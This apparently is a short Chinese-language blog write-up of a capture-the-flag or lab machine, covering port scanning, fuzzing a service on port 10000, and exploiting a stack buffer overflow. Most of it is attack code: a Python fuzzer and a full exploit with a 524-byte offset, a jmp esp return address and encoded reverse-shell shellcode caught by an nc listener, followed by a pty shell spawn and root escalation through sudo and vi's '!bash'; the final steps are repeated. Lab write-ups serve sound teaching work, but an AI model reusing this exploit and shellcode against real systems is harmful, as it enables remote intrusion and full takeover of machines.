nmap先掃全port
再掃sV、A
browser連入10000port,robots沒東西、source沒東西,找爆破
取得檔案
用immunity debugger開啟檔案,並執行run
嘗試fuzz該port,發生crash,找到EIP位址在35724134
fuzz_payload:
import sys, socket
host = sys.argv[1]
port = int(sys.argv[2])
junk = ""#ruby /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000
con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con.connect((host, port))
con.recv(1024)
con.send(junk.encode('utf-8'))
con.close()
得知塞524個字串就會溢位
透過objdump找出jmp esp或call eax的位址來塞shellcode,得知位址為311712F3,轉為\xF3\x12\x17\x31
再產shellcode,移除\x00
nc建5555port等回連
再做一次fuzz:
import sys,socket
eip = "\xf3\x12\x17\x31" #jmp esp address 0x311712f3
b = "\x90"*10 #nop sled
buf = ""
buf += "\xdb\xc8\xd9\x74\x24\xf4\x5d\xb8\x61\x9a\x57\x74\x29"
buf += "\xc9\xb1\x12\x31\x45\x17\x83\xed\xfc\x03\x24\x89\xb5"
buf += "\x81\x97\x76\xce\x89\x84\xcb\x62\x24\x28\x45\x65\x08"
buf += "\x4a\x98\xe6\xfa\xcb\x92\xd8\x31\x6b\x9b\x5f\x33\x03"
buf += "\xdc\x08\xc2\xb5\xb4\x4a\xc5\x2c\xf6\xc2\x24\xfe\x9e"
buf += "\x84\xf7\xad\xed\x26\x71\xb0\xdf\xa9\xd3\x5a\x8e\x86"
buf += "\xa0\xf2\x26\xf6\x69\x60\xde\x81\x95\x36\x73\x1b\xb8"
buf += "\x06\x78\xd6\xbb"
payload = ("a"*524) + eip + b + buf
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((sys.argv[1],int(sys.argv[2])))
print s.recv(1024)
s.send(payload)
print s.recv(1024)
s.close()
回連成功,再用python -c 'import pty;pty.spawn("/bin/bash")'拿完整shell
找/etc/passwd有家目錄且有/bin/bash
sudo -l 發現可疑檔案
sudo 檔案後發現+ manual後可透過root權限執行任意檔案
執行vi寫!bash拿root shell
sudo -l 發現可疑檔案
sudo 檔案後發現+ manual後可透過root權限執行任意檔案
執行vi寫!bash拿root shell
沒有留言:
張貼留言